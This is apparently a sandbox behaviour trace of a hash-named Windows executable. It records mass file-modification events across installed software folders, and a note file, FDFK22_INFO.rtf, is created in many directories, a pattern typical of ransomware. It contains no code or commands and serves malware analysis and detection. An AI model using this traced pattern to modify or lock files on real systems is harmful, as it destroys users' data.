a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Toronto a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Majuro a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\security\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\Synchronization.rll a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200616092700.pma a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\management.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hebron a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\resources.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-loaders.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\images\cursors\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\am.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tegucigalpa a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\UnregisterStop.midi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jakarta a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Dublin a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Mail\en-US\WinMail.exe.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tallinn a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoDev.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dubai a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Louisville a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baghdad a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ro.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\amd64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Bissau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Nairobi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Khartoum a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-1 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Belgrade a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png 